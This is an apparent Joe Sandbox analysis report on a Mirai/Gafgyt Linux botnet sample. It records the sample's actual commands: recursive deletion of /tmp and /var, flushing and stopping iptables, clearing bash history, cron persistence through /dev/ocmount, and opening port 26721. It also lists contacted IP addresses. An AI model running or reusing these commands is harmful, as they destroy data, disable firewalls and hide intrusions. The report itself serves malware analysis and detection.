Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
OocBsRyXoT.elf

Overview

General Information

Sample name:OocBsRyXoT.elf
renamed because original name is a hash value
Original sample name:260de6a801277739bcb82f95c95fe71a.elf
Analysis ID:1527523
MD5:260de6a801277739bcb82f95c95fe71a
SHA1:81c1cff2e0ff595d20f4ef438e328a2cb12fb37c
SHA256:10626c18e9ff960de8996994bf80aca9facb88e14b0cb6f720b2207962218576
Tags:32elfmipsmirai
Infos:

Detection

Gafgyt, Mirai
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Yara detected Mirai
Executes the "iptables" command to insert, remove and/or manipulate rules
Manipulation of devices in /dev
Sample deletes itself
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Tries to stop the "iptables" service
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /sys indicative of miner or evasive malware
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1527523
Start date and time:2024-10-07 01:14:21 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 40s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:OocBsRyXoT.elf
renamed because original name is a hash value
Original Sample Name:260de6a801277739bcb82f95c95fe71a.elf
Detection:MAL
Classification:mal96.spre.troj.evad.linELF@0/2@50/0
  • Connection to analysis system has been lost, crash info: Unknown
  • VT rate limit hit for: OocBsRyXoT.elf
Command:/tmp/OocBsRyXoT.elf
PID:5516
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Octopus Caught You
Standard Error:Failed to stop iptables.service: Unit iptables.service not loaded.
Failed to stop firewall.service: Unit firewall.service not loaded.
sh: 1: history: not found
sh: 1: history: not found
  • system is lnxubuntu20
  • dash New Fork (PID: 5506, Parent: 3670)
  • rm (PID: 5506, Parent: 3670, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.fI4m1NBVX4 /tmp/tmp.0aDbaPXlHh /tmp/tmp.j6TAhrR2Ij
  • dash New Fork (PID: 5507, Parent: 3670)
  • rm (PID: 5507, Parent: 3670, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.fI4m1NBVX4 /tmp/tmp.0aDbaPXlHh /tmp/tmp.j6TAhrR2Ij
  • OocBsRyXoT.elf (PID: 5516, Parent: 5442, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/OocBsRyXoT.elf
    • sh (PID: 5520, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
      • sh New Fork (PID: 5522, Parent: 5520)
      • rm (PID: 5522, Parent: 5520, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/OocBsRyXoT.elf /tmp/config-err-8GMGF7 /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-oCVxfzsbTQaT /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-ModemManager.service-gKnN3f /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-colord.service-ttuwai /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-fwupd.service-RBxnUi /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-switcheroo-control.service-2Gilej /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-logind.service-Nw8Bch /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-resolved.service-b6o3kh /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-timedated.service-57YtQh /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-upower.service-70vK5e /tmp/vmware-root_724-2965906890 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-ModemManager.service-8RZKbg /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-colord.service-i36c6f /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-fwupd.service-ScOpqh /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-switcheroo-control.service-HC2Noh /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-logind.service-IgPdPh /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-resolved.service-VqRX8h /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-timedated.service-JxTQHi /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-upower.service-aLITRg /var/log/wtmp
    • sh (PID: 5534, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /tmp/*"
      • sh New Fork (PID: 5536, Parent: 5534)
      • rm (PID: 5536, Parent: 5534, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/*
    • sh (PID: 5537, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -F"
      • sh New Fork (PID: 5539, Parent: 5537)
      • iptables (PID: 5539, Parent: 5537, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F
    • sh (PID: 5543, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 busybox"
      • sh New Fork (PID: 5549, Parent: 5543)
      • pkill (PID: 5549, Parent: 5543, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 busybox
    • sh (PID: 5551, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 perl"
      • sh New Fork (PID: 5556, Parent: 5551)
      • pkill (PID: 5556, Parent: 5551, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 perl
    • sh (PID: 5560, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 python"
      • sh New Fork (PID: 5562, Parent: 5560)
      • pkill (PID: 5562, Parent: 5560, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 python
    • sh (PID: 5563, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "service iptables stop"
      • sh New Fork (PID: 5565, Parent: 5563)
      • service (PID: 5565, Parent: 5563, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service iptables stop
        • service New Fork (PID: 5566, Parent: 5565)
        • basename (PID: 5566, Parent: 5565, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5567, Parent: 5565)
        • basename (PID: 5567, Parent: 5565, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5568, Parent: 5565)
        • systemctl (PID: 5568, Parent: 5565, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5569, Parent: 5565)
          • service New Fork (PID: 5570, Parent: 5569)
          • systemctl (PID: 5570, Parent: 5569, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5571, Parent: 5569)
          • sed (PID: 5571, Parent: 5569, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5565, Parent: 5563, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop iptables.service
    • sh (PID: 5575, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/sbin/iptables -F; /sbin/iptables -X"
      • sh New Fork (PID: 5577, Parent: 5575)
      • iptables (PID: 5577, Parent: 5575, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -F
      • sh New Fork (PID: 5578, Parent: 5575)
      • iptables (PID: 5578, Parent: 5575, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -X
    • sh (PID: 5579, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "service firewall stop"
      • sh New Fork (PID: 5581, Parent: 5579)
      • service (PID: 5581, Parent: 5579, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service firewall stop
        • service New Fork (PID: 5582, Parent: 5581)
        • basename (PID: 5582, Parent: 5581, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5583, Parent: 5581)
        • basename (PID: 5583, Parent: 5581, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5584, Parent: 5581)
        • systemctl (PID: 5584, Parent: 5581, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5585, Parent: 5581)
          • service New Fork (PID: 5586, Parent: 5585)
          • systemctl (PID: 5586, Parent: 5585, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5587, Parent: 5585)
          • sed (PID: 5587, Parent: 5585, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5581, Parent: 5579, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop firewall.service
    • sh (PID: 5612, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "history -c"
    • sh (PID: 5614, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf ~/.bash_history"
      • sh New Fork (PID: 5616, Parent: 5614)
      • rm (PID: 5616, Parent: 5614, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.bash_history
    • sh (PID: 5617, Parent: 5516, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "history -w"
    • OocBsRyXoT.elf New Fork (PID: 5619, Parent: 5516)
      • OocBsRyXoT.elf New Fork (PID: 5624, Parent: 5619)
        • sh (PID: 5627, Parent: 5624, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /dev/ocmount"
          • sh New Fork (PID: 5632, Parent: 5627)
          • chmod (PID: 5632, Parent: 5627, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /dev/ocmount
        • sh (PID: 5635, Parent: 5624, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
        • sh (PID: 5683, Parent: 5624, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /dev/ocmount
          • sh New Fork (PID: 5733, Parent: 5683)
        • OocBsRyXoT.elf New Fork (PID: 5911, Parent: 5624)
          • sh (PID: 5914, Parent: 5911, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5928, Parent: 5914)
            • iptables (PID: 5928, Parent: 5914, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
          • sh (PID: 5936, Parent: 5911, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5938, Parent: 5936)
            • busybox (PID: 5938, Parent: 5936, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
          • sh (PID: 5939, Parent: 5911, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5941, Parent: 5939)
          • sh (PID: 5942, Parent: 5911, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5944, Parent: 5942)
          • sh (PID: 5945, Parent: 5911, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5947, Parent: 5945)
            • busybox (PID: 5947, Parent: 5945, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
      • OocBsRyXoT.elf New Fork (PID: 5883, Parent: 5619)
        • sh (PID: 5886, Parent: 5883, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5899, Parent: 5886)
          • iptables (PID: 5899, Parent: 5886, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        • sh (PID: 5906, Parent: 5883, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5908, Parent: 5906)
          • busybox (PID: 5908, Parent: 5906, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        • sh (PID: 5909, Parent: 5883, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5915, Parent: 5909)
        • sh (PID: 5929, Parent: 5883, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5931, Parent: 5929)
        • sh (PID: 5932, Parent: 5883, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5934, Parent: 5932)
          • busybox (PID: 5934, Parent: 5932, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
  • systemd New Fork (PID: 5639, Parent: 1)
  • upowerd (PID: 5639, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • sh (PID: 5680, Parent: 1498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-wacom
  • gsd-wacom (PID: 5680, Parent: 1498, MD5: 13778dd1a23a4e94ddc17ac9caa4fcc1) Arguments: /usr/libexec/gsd-wacom
  • sh (PID: 5682, Parent: 1498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard
  • gsd-keyboard (PID: 5682, Parent: 1498, MD5: 8e288fd17c80bb0a1148b964b2ac2279) Arguments: /usr/libexec/gsd-keyboard
  • sh (PID: 5690, Parent: 1498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 5690, Parent: 1498, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • systemd New Fork (PID: 5691, Parent: 1)
  • upowerd (PID: 5691, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • sh (PID: 5732, Parent: 1498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard
  • gsd-smartcard (PID: 5732, Parent: 1498, MD5: ea1fbd7f62e4cd0331eae2ef754ee605) Arguments: /usr/libexec/gsd-smartcard
  • wrapper-2.0 (PID: 5737, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • systemd New Fork (PID: 5738, Parent: 1)
  • sh (PID: 5779, Parent: 1498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys
  • gsd-media-keys (PID: 5779, Parent: 1498, MD5: a425448c135afb4b8bfd79cc0b6b74da) Arguments: /usr/libexec/gsd-media-keys
  • wrapper-2.0 (PID: 5782, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • sh (PID: 5783, Parent: 1498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy
  • gsd-screensaver-proxy (PID: 5783, Parent: 1498, MD5: 77e309450c87dceee43f1a9e50cc0d02) Arguments: /usr/libexec/gsd-screensaver-proxy
  • systemd New Fork (PID: 5784, Parent: 1)
  • upowerd (PID: 5784, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • wrapper-2.0 (PID: 5789, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • sh (PID: 5808, Parent: 1498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sound
  • gsd-sound (PID: 5808, Parent: 1498, MD5: 4c7d3fb993463337b4a0eb5c80c760ee) Arguments: /usr/libexec/gsd-sound
  • wrapper-2.0 (PID: 5812, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • sh (PID: 5827, Parent: 1498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-a11y-settings
  • gsd-a11y-settings (PID: 5827, Parent: 1498, MD5: 18e243d2cf30ecee7ea89d1462725c5c) Arguments: /usr/libexec/gsd-a11y-settings
  • wrapper-2.0 (PID: 5829, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 5831, Parent: 3235, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • sh (PID: 5836, Parent: 1498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power
  • gsd-power (PID: 5836, Parent: 1498, MD5: 28b8e1b43c3e7f1db6741ea1ecd978b7) Arguments: /usr/libexec/gsd-power
  • systemd New Fork (PID: 5838, Parent: 1)
  • upowerd (PID: 5838, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • udisksd New Fork (PID: 5898, Parent: 803)
  • udisksd New Fork (PID: 5927, Parent: 803)
  • dumpe2fs (PID: 5927, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/sda2
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
OocBsRyXoT.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    OocBsRyXoT.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      5516.1.00007f4db4400000.00007f4db4434000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
        5516.1.00007f4db4400000.00007f4db4434000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5911.1.00007f4db4400000.00007f4db4434000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
            5911.1.00007f4db4400000.00007f4db4434000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: OocBsRyXoT.elfAvira: detected
              Source: OocBsRyXoT.elfReversingLabs: Detection: 50%
              Source: /usr/bin/pkill (PID: 5549)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5556)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

              Networking

              barindex
              Source: /bin/sh (PID: 5928)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 5899)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /usr/sbin/service (PID: 5565)Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5565)Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: global trafficTCP traffic: 192.168.2.15:52852 -> 156.238.224.214:8443
              Source: global trafficTCP traffic: 192.168.2.15:45408 -> 212.118.43.167:2222
              Source: /bin/sh (PID: 5539)Iptables executable: /usr/sbin/iptables -> iptables -FJump to behavior
              Source: /bin/sh (PID: 5577)Iptables executable: /sbin/iptables -> /sbin/iptables -FJump to behavior
              Source: /bin/sh (PID: 5578)Iptables executable: /sbin/iptables -> /sbin/iptables -XJump to behavior
              Source: /bin/sh (PID: 5928)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 5899)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5516)Socket: 127.0.0.1:8013Jump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5883)Socket: 0.0.0.0:31337Jump to behavior
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 134.195.4.2
              Source: unknownUDP traffic detected without corresponding DNS query: 134.195.4.2
              Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
              Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
              Source: unknownUDP traffic detected without corresponding DNS query: 51.77.149.139
              Source: unknownUDP traffic detected without corresponding DNS query: 51.77.149.139
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
              Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
              Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
              Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
